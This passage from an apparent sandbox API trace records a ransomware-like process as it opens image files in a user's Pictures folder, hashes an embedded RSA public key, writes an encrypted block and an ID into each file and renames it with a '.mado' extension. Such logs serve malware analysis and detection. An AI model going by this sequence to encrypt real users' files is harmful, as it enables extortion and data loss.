(HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.458] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\If0DlMdLe6v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\if0dlmdle6v.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\If0DlMdLe6v.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\if0dlmdle6v.png.mado")) returned 1 [0206.460] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f20ce30, ftCreationTime.dwHighDateTime=0x1d5dae6, ftLastAccessTime.dwLowDateTime=0x156fd8a0, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0x156fd8a0, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PFhCel7TQAYtpink7jNG", cAlternateFileName="PFHCEL~1")) returned 1 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292eb8 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3294350 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeec8 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77e70 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77db8 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b78098 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0206.460] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6618ab0, ftCreationTime.dwHighDateTime=0x1d5e389, ftLastAccessTime.dwLowDateTime=0x1e81210, ftLastAccessTime.dwHighDateTime=0x1d5df33, ftLastWriteTime.dwLowDateTime=0x1e81210, ftLastWriteTime.dwHighDateTime=0x1d5df33, nFileSizeHigh=0x0, nFileSizeLow=0xa96f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PuORbOpf4SJEx.jpg", cAlternateFileName="PUORBO~1.JPG")) returned 1 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77fe0 [0206.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b67078 [0206.460] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PuORbOpf4SJEx.jpg") returned=".jpg" [0206.461] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PuORbOpf4SJEx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\puorbopf4sjex.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.461] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=43375) returned 1 [0206.461] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.463] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa949, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.463] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.465] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa96f, lpOverlapped=0x0) returned 1 [0206.465] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.466] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.466] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321a68) returned 1 [0206.466] CryptCreateHash (in: hProv=0x321a68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.466] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.466] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.467] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.467] GetLastError () returned 0x0 [0206.467] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.467] CryptReleaseContext (hProv=0x321a68, dwFlags=0x0) returned 1 [0206.467] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.467] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.467] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.467] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b816a8, Size=0x218) returned 0x3b7c6a8 [0206.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.468] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa96f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.468] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.468] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.468] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.468] CloseHandle (hObject=0x63c) returned 1 [0206.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e0) returned 0x3b7b950 [0206.470] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PuORbOpf4SJEx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\puorbopf4sjex.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PuORbOpf4SJEx.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\puorbopf4sjex.jpg.mado")) returned 1 [0206.471] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc33200b0, ftCreationTime.dwHighDateTime=0x1d5e1d7, ftLastAccessTime.dwLowDateTime=0x751f4d50, ftLastAccessTime.dwHighDateTime=0x1d5df49, ftLastWriteTime.dwLowDateTime=0x751f4d50, ftLastWriteTime.dwHighDateTime=0x1d5df49, nFileSizeHigh=0x0, nFileSizeLow=0x2829, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TEFQ3qE.gif", cAlternateFileName="")) returned 1 [0206.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77fe0 [0206.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b67078 [0206.471] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\TEFQ3qE.gif") returned=".gif" [0206.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\TEFQ3qE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\tefq3qe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.472] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=10281) returned 1 [0206.472] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.474] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2803, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.474] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.476] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x2829, lpOverlapped=0x0) returned 1 [0206.476] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.477] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.477] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.477] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321a68) returned 1 [0206.477] CryptCreateHash (in: hProv=0x321a68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.477] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.477] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.478] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.478] GetLastError () returned 0x0 [0206.478] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.478] CryptReleaseContext (hProv=0x321a68, dwFlags=0x0) returned 1 [0206.478] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.478] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.478] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.478] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b816a8, Size=0x218) returned 0x3b7c6a8 [0206.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.478] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x2829, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.478] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.479] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.479] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.479] CloseHandle (hObject=0x63c) returned 1 [0206.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.483] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\TEFQ3qE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\tefq3qe.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\TEFQ3qE.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\tefq3qe.gif.mado")) returned 1 [0206.486] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc33200b0, ftCreationTime.dwHighDateTime=0x1d5e1d7, ftLastAccessTime.dwLowDateTime=0x751f4d50, ftLastAccessTime.dwHighDateTime=0x1d5df49, ftLastWriteTime.dwLowDateTime=0x751f4d50, ftLastWriteTime.dwHighDateTime=0x1d5df49, nFileSizeHigh=0x0, nFileSizeLow=0x2829, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TEFQ3qE.gif", cAlternateFileName="")) returned 0 [0206.486] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77d00 | out: hHeap=0x2c0000) returned 1 [0206.486] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bd78 [0206.486] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.489] 